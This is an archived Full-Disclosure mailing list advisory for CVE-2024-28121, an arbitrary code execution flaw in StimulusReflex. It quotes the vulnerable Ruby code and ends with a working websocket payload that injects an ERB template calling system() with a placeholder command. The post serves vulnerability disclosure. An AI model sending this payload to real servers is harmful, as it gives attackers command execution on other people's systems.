lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <fym6_mEQHWBDdqBI-C7JTP_Mlt-qtBEED6e75dMLhaI3jedXlL6yP6bhVfjxUw3w-0No49-E-iO_I1Bj-9-FmyLLug3lk9CSSV5wughcpTU=@proton.me> Date: Mon, 11 Mar 2024 19:22:15 +0000 From: lixts via Fulldisclosure <fulldisclosure@...lists.org> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] StimulusReflex CVE-2024-28121 StimulusReflex CVE-2024-28121 Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10. ## Vulnerable code excerpt stimulus_reflex/lib/stimulus_reflex/reflex.rb ``` # Invoke the reflex action specified by `name` and run all callbacks def process(name, *args) run_callbacks(:process) { public_send(name, *args) } end ``` stimulus_reflex/app/channels/stimulus_reflex/channel.rb ``` def delegate_call_to_reflex(reflex) method_name = reflex.method_name arguments = reflex.data.arguments method = reflex.method(method_name) policy = StimulusReflex::ReflexMethodInvocationPolicy.new(method, arguments) if policy.no_arguments? reflex.process(method_name) elsif policy.arguments? reflex.process(method_name, *arguments) else raise ArgumentError.new("wrong number of arguments (given #{arguments.inspect}, expected #{policy.required_params.inspect}, optional #{policy.optional_params.inspect})") end end ``` stimulus_reflex/lib/stimulus_reflex/policies/reflex_invocation_policy.rb ``` module StimulusReflex class ReflexMethodInvocationPolicy attr_reader :arguments, :required_params, :optional_params def initialize(method, arguments) @arguments = arguments @required_params = method.parameters.select { |(kind, _)| kind == :req } @optional_params = method.parameters.select { |(kind, _)| kind == :opt } end def no_arguments? arguments.size == 0 && required_params.size == 0 end def arguments? arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size end def unknown? return false if no_arguments? return false if arguments? true end end end ``` ## Payload Find a websocket message with target and args. ``` \"target\":\"StimulusReflex::Reflex#render_collection\",\"args\":[{\"inline\": \"<% system('[command here]') %>\"}] ``` _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists